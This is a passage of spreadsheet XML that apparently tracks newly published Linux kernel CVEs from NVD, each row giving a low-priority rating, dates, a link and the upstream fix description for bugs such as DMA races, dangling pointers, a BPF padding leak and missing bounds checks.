          <t>NVD</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q984" s="5" t="inlineStr"/>
      <c r="R984" s="5" t="inlineStr"/>
      <c r="S984" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
csky: Fix a4/a5 restoration in syscall trace path
The syscall trace path reloads syscall arguments from pt_regs before
calling the syscall handler. On C-SKY ABIv2, the 5th and 6th syscall
arguments are prepared as stack arguments before invoking syscallid.
The current code adjusts sp before loading LSAVE_A4 and LSAVE_A5. Since
those offsets are relative to the original pt_regs base, loading them
after changing sp fetches the wrong slots. As a result, traced syscalls
that use the 5th or 6th argument may receive corrupted arguments.
This is visible with mmap2(), which takes six arguments. A small
PTRACE_SYSCALL reproducer opens a file and maps one page with:
  mmap(NULL, 4096, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0)
Before the fix, the traced child fails the mmap and exits with 12.
After the fix, the mapping succeeds and the child exits with 0.
Fix the trace path by loading a4/a5 from pt_regs before changing sp.
Tested on: ck860f, linux-4.19.15, C-SKY abiv2</t>
        </is>
      </c>
      <c r="T984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93167</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93168</t>
        </is>
      </c>
      <c r="D985" s="5" t="inlineStr"/>
      <c r="E985" s="5" t="inlineStr"/>
      <c r="F985" s="5" t="inlineStr"/>
      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="inlineStr"/>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr"/>
      <c r="L985" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q985" s="5" t="inlineStr"/>
      <c r="R985" s="5" t="inlineStr"/>
      <c r="S985" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: xilinx_dma: Fix CPU stall in xilinx_dma_poll_timeout
Currently when calling xilinx_dma_poll_timeout with delay_us=0 and a
condition that is never fulfilled, the CPU busy-waits for prolonged time
and the timeout triggers only with a massive delay causing a CPU stall.
This happens due to a huge underestimation of wall clock time in
poll_timeout_us_atomic. Commit 7349a69cf312 ("iopoll: Do not use
timekeeping in read_poll_timeout_atomic()") changed the behavior to no
longer use ktime_get at the expense of underestimation of wall clock
time which appears to be very large for delay_us=0. Instead of timing
out after approximately XILINX_DMA_LOOP_COUNT microseconds, the timeout
takes XILINX_DMA_LOOP_COUNT * 1000 * (time that the overhead of the for
loop in poll_timeout_us_atomic takes) which is in the range of several
minutes for XILINX_DMA_LOOP_COUNT=1000000. Fix this by using a non-zero
value for delay_us. Use delay_us=10 to keep the delay in the hot path of
starting DMA transfers minimal but still avoid CPU stalls in case of
unexpected hardware failures.
One-off measurement with delay_us=0 causes the cpu to busy wait around 7
minutes in the timeout case. After applying this patch with delay_us=10
the measured timeout was 1053428 microseconds which is roughly
equivalent to the expected 1000000 microseconds specified in
XILINX_DMA_LOOP_COUNT.
Add a constant XILINX_DMA_POLL_DELAY_US for delay_us value.</t>
        </is>
      </c>
      <c r="T985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93168</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93169</t>
        </is>
      </c>
      <c r="D986" s="5" t="inlineStr"/>
      <c r="E986" s="5" t="inlineStr"/>
      <c r="F986" s="5" t="inlineStr"/>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="inlineStr"/>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr"/>
      <c r="L986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q986" s="5" t="inlineStr"/>
      <c r="R986" s="5" t="inlineStr"/>
      <c r="S986" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: zynqmp_dma: fix race between runtime PM and device removal
In zynqmp_dma_remove(), runtime PM was disabled only after checking
state and doing a manual suspend. This can race with runtime PM in the
remove/unbind (rmmod) path.
Disable runtime PM first, then suspend only if the device is not already
suspended. To prevent any further runtime PM transitions.</t>
        </is>
      </c>
      <c r="T986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93169</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93170</t>
        </is>
      </c>
      <c r="D987" s="5" t="inlineStr"/>
      <c r="E987" s="5" t="inlineStr"/>
      <c r="F987" s="5" t="inlineStr"/>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="inlineStr"/>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr"/>
      <c r="L987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q987" s="5" t="inlineStr"/>
      <c r="R987" s="5" t="inlineStr"/>
      <c r="S987" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: xilinx_dma: Fix channel idle state management in AXIDMA and MCDMA interrupt handlers
Fix a race condition in AXIDMA and MCDMA irq handlers where the channel
could be incorrectly marked as idle and attempt spurious transfers when
descriptors are still being processed.
The issue occurs when:
1. Multiple descriptors are queued and active.
2. An interrupt fires after completing some descriptors.
3. xilinx_dma_complete_descriptor() moves completed descriptors to
done_list.
4. Channel is marked idle and start_transfer() is called even though
   active_list still contains unprocessed descriptors.
5. This leads to premature transfer attempts and potential descriptor
   corruption or missed completions.
Only mark the channel as idle and start new transfers when the active list
is actually empty, ensuring proper channel state management and avoiding
spurious transfer attempts.</t>
        </is>
      </c>
      <c r="T987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93170</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93171</t>
        </is>
      </c>
      <c r="D988" s="5" t="inlineStr"/>
      <c r="E988" s="5" t="inlineStr"/>
      <c r="F988" s="5" t="inlineStr"/>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="inlineStr"/>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr"/>
      <c r="L988" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q988" s="5" t="inlineStr"/>
      <c r="R988" s="5" t="inlineStr"/>
      <c r="S988" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
leds: lp5860: Fix a potential double-unlock
In lp5860_device_init(), if lp5860_init_dt() fails, an already unlocked
mutex is unlocked another time.
Slightly rework how the lock is taken/released to avoid this potential
double unlock.</t>
        </is>
      </c>
      <c r="T988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93171</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93172</t>
        </is>
      </c>
      <c r="D989" s="5" t="inlineStr"/>
      <c r="E989" s="5" t="inlineStr"/>
      <c r="F989" s="5" t="inlineStr"/>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="inlineStr"/>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr"/>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q989" s="5" t="inlineStr"/>
      <c r="R989" s="5" t="inlineStr"/>
      <c r="S989" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/mm_init: handle alloc_percpu failure in free_area_init_core_hotplug
We miss a failed allocation check for pgdat-&gt;per_cpu_nodestats, which
results in a NULL deref when we offset into the per-cpu area.
Propagate -ENOMEM up the stack and leave per_cpu_nodestats pointing
at boot_nodestats so a later online can retry the allocation.
hotadd_init_pgdat() returns NULL on failure, which __try_online_node()
already maps to -ENOMEM.
On failure nothing needs to be unwound:
  - the node is never marked online
  - per_cpu_nodestats is left pointing at boot_nodestats
  - __add_memory_resource() cleans up pending memblock resources
  - later online attempts retry the per_cpu_nodestats allocation</t>
        </is>
      </c>
      <c r="T989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93172</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93173</t>
        </is>
      </c>
      <c r="D990" s="5" t="inlineStr"/>
      <c r="E990" s="5" t="inlineStr"/>
      <c r="F990" s="5" t="inlineStr"/>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="inlineStr"/>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr"/>
      <c r="L990" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q990" s="5" t="inlineStr"/>
      <c r="R990" s="5" t="inlineStr"/>
      <c r="S990" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf,lsm: Drop bpf_prog_free from sleepable_lsm_hooks
__bpf_prog_put_rcu() is the call_rcu() callback for non-sleepable programs.
security_bpf_prog_free() called from there fires bpf_prog_free in softirq;
if a sleepable LSM prog is attached to that hook, might_fault() BUGs:
  BUG: sleeping function called from invalid context
  in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 5038
  preempt_count: 101, expected: 0
  Call Trace:
   &lt;IRQ&gt;
   __bpf_prog_enter_sleepable+0x1cd/0x320 kernel/bpf/trampoline.c:1255
   bpf_trampoline_6442549705+0x53/0xd7
   security_bpf_prog_free+0xde/0x130 security/security.c:5465
   __bpf_prog_put_rcu+0xab/0xd0 kernel/bpf/syscall.c:2365
   rcu_do_batch kernel/rcu/tree.c:2617 [inline]
   handle_softirqs+0x236/0x800 kernel/softirq.c:622
   &lt;/IRQ&gt;
The call_rcu/call_rcu_tasks_trace split reflects the freed program's
sleepability, not that of any attached observer.
security_bpf_prog_free() also frees prog-&gt;aux-&gt;security, which has to stay
after the grace period, so drop bpf_prog_free from sleepable_lsm_hooks
rather than move the call. Non-sleepable observers still run there.</t>
        </is>
      </c>
      <c r="T990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93173</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93174</t>
        </is>
      </c>
      <c r="D991" s="5" t="inlineStr"/>
      <c r="E991" s="5" t="inlineStr"/>
      <c r="F991" s="5" t="inlineStr"/>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="inlineStr"/>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr"/>
      <c r="L991" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q991" s="5" t="inlineStr"/>
      <c r="R991" s="5" t="inlineStr"/>
      <c r="S991" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Copy per-CPU map value padding in copy_map_value_long()
In kernel, per-CPU map elements are stored with
round_up(map-&gt;value_size, 8) bytes. On UAPI lookup paths, it copies the
rounded size for each CPU into a temporary buffer.
However, copy_map_value_long() passes 'map-&gt;value_size' to
bpf_obj_memcpy(). When the map has special fields, bpf_obj_memcpy() copies
around those fields with memcpy(), and does not copy the tail padding
between 'map-&gt;value_size' and round_up(map-&gt;value_size, 8).
The temporary UAPI lookup buffers are allocated without __GFP_ZERO. As a
result, when the per-CPU map's value size is not equal to
round_up(map-&gt;value_size, 8), UAPI LOOKUP_ELEM and its variants can return
stale heap contents from that padding to user space. The same issue
applies to bpf_iter for per-CPU maps.
Pass round_up(map-&gt;value_size, 8) to bpf_obj_memcpy() from
copy_map_value_long(), so per-CPU maps both with and without special
fields copy the entire per-CPU slot. Remove the now redundant round_up()
from bpf_obj_memcpy()'s long_memcpy path.</t>
        </is>
      </c>
      <c r="T991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93174</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93175</t>
        </is>
      </c>
      <c r="D992" s="5" t="inlineStr"/>
      <c r="E992" s="5" t="inlineStr"/>
      <c r="F992" s="5" t="inlineStr"/>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="inlineStr"/>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr"/>
      <c r="L992" s="5" t="inlineStr"/>
      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q992" s="5" t="inlineStr"/>
      <c r="R992" s="5" t="inlineStr"/>
      <c r="S992" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix dangling pointer in CRTC reset function
amdgpu_dm_crtc_reset_state() frees the old state before allocating
a new one. If kzalloc() fails, the function returns without updating
the state pointer, leaving a dangling pointer to already freed memory.
Fix this by allocating the new state first. On allocation failure, the
old state remains untouched and the function safely returns.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
[adjust for movement around current amd-staging-drm-next]</t>
        </is>
      </c>
      <c r="T992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93175</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93176</t>
        </is>
      </c>
      <c r="D993" s="5" t="inlineStr"/>
      <c r="E993" s="5" t="inlineStr"/>
      <c r="F993" s="5" t="inlineStr"/>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="inlineStr"/>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr"/>
      <c r="L993" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q993" s="5" t="inlineStr"/>
      <c r="R993" s="5" t="inlineStr"/>
      <c r="S993" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix dangling pointer in plane reset function
amdgpu_dm_plane_drm_plane_reset() frees the old state before allocating
a new one. If kzalloc() fails, the function returns without updating
the state pointer, leaving a dangling pointer to already freed memory.
Fix this by allocating the new state first. On allocation failure, the
old state remains untouched and the function safely returns.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
[adjust for movement around current amd-staging-drm-next]</t>
        </is>
      </c>
      <c r="T993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93176</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93177</t>
        </is>
      </c>
      <c r="D994" s="5" t="inlineStr"/>
      <c r="E994" s="5" t="inlineStr"/>
      <c r="F994" s="5" t="inlineStr"/>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="inlineStr"/>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr"/>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q994" s="5" t="inlineStr"/>
      <c r="R994" s="5" t="inlineStr"/>
      <c r="S994" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/pm/powerplay: bounds-check voltage index in Vega10 lookup
vddInd, vddciInd and mvddInd from VBIOS-parsed tables index into vddc,
vddci and vddmem lookup tables without bounds checks across nine sites.
Return -EINVAL when any index is out of range.</t>
        </is>
      </c>
      <c r="T994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93177</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93178</t>
        </is>
      </c>
      <c r="D995" s="5" t="inlineStr"/>
      <c r="E995" s="5" t="inlineStr"/>
      <c r="F995" s="5" t="inlineStr"/>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="inlineStr"/>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr"/>
      <c r="L995" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q995" s="5" t="inlineStr"/>
      <c r="R995" s="5" t="inlineStr"/>
      <c r="S995" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/pm/powerplay: bounds-check voltage index in SMU7 lookup
vddInd and vddcInd fields from VBIOS-parsed tables are used to index into
voltage lookup tables without a bounds check. Return -EINVAL when any
index is out of range.</t>
        </is>
      </c>
      <c r="T995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93178</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93179</t>
        </is>
      </c>
      <c r="D996" s="5" t="inlineStr"/>
      <c r="E996" s="5" t="inlineStr"/>
      <c r="F996" s="5" t="inlineStr"/>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="inlineStr"/>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr"/>
      <c r="L996" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q996" s="5" t="inlineStr"/>
      <c r="R996" s="5" t="inlineStr"/>
      <c r="S996" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/powerplay: fix VoltageObjectInfo zero-stride loop and OOB read
Reject voltage objects whose usSize is smaller than the header or would
advance the cursor past the table end, preventing an infinite loop or
heap OOB read when the VBIOS supplies a malformed VoltageObjectInfo table.</t>
        </is>
      </c>
      <c r="T996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93179</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93180</t>
        </is>
      </c>
      <c r="D997" s="5" t="inlineStr"/>
      <c r="E997" s="5" t="inlineStr"/>
      <c r="F997" s="5" t="inlineStr"/>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="inlineStr"/>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr"/>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q997" s="5" t="inlineStr"/>
      <c r="R997" s="5" t="inlineStr"/>
      <c r="S997" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: Fix NPD issue on partial unmap of an evicted BO
This commit fixes the NULL pointer dereference issue that would have
happened on the split of GPU mapping due to partial unmap of an evicted
BO. There is a logic to handle the partial unmap of huge pages when the
GPU mapping is split. That logic was not being completely skipped for
the VMA of an evicted BO and that resulted in a NPD possibility for the
'bo-&gt;backing.pages' pointer, which is set to NULL when pages of a
BO are released on eviction.
Following dump was seen when a partial unmap was exercised for an
evicted BO.
Unable to handle kernel paging request at virtual address 0000000000002000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pgdp=00000008842e8000
[0000000000002000] pgd=0000000000000000, p4d=0000000000000000
Internal error: Oops: 0000000096000004 [#1]  SMP
&lt;snip&gt;
pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : iova_mapped_as_huge_page+0x20/0x68 [panthor]
lr : panthor_gpuva_sm_step_remap+0x39c/0x498 [panthor]
sp : ffff800086193920
x29: ffff800086193920 x28: ffff800086193a18 x27: ffff800086193b80
x26: 0000000000400000 x25: 0000000000810000 x24: 0000000000400000
x23: ffff000808af1800 x22: 0000000000a00000 x21: ffff800086193a00
x20: ffff000806fd3f00 x19: 0000000000410000 x18: 00000000ffffffff
x17: 0000000000000000 x16: 0000000000000000 x15: ffff800083ce2d83
x14: 0000000000000000 x13: 3120646574636976 x12: 6520303030303138
x11: 2d30303030313420 x10: ffff8000836e6c80 x9 : ffff80007bfc889c
x8 : 3fffffffffffefff x7 : ffff8000836e6c80 x6 : 0000000000000000
x5 : ffff00097ef19088 x4 : 0000000000000000 x3 : 0000000000000000
x2 : 0000000000010000 x1 : 0000000000000400 x0 : 0000000000000000
Call trace:
 iova_mapped_as_huge_page+0x20/0x68 [panthor] (P)
 op_remap_cb.isra.0+0x70/0xb0
 __drm_gpuvm_sm_unmap+0xf8/0x1c0
 drm_gpuvm_sm_unmap+0x40/0x60
 panthor_vm_exec_op+0xa0/0x168 [panthor]
 panthor_vm_bind_exec_sync_op+0x8c/0xb8 [panthor]
 panthor_ioctl_vm_bind+0xbc/0x170 [panthor]
 drm_ioctl_kernel+0xc0/0x140
 drm_ioctl+0x20c/0x500
 __arm64_sys_ioctl+0xb4/0x118
 invoke_syscall+0x5c/0x120
 el0_svc_common.constprop.0+0x48/0xf8
 do_el0_svc+0x28/0x40
 el0_svc+0x38/0x128
 el0t_64_sync_handler+0xa0/0xe8
 el0t_64_sync+0x198/0x1a0
Code: 8b030021 cb020021 f940b800 d34cfc21 (f8617801)
---[ end trace 0000000000000000 ]---
v2: Fix indentation</t>
        </is>
      </c>
      <c r="T997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93180</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93181</t>
        </is>
      </c>
      <c r="D998" s="5" t="inlineStr"/>
      <c r="E998" s="5" t="inlineStr"/>
      <c r="F998" s="5" t="inlineStr"/>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="inlineStr"/>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr"/>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
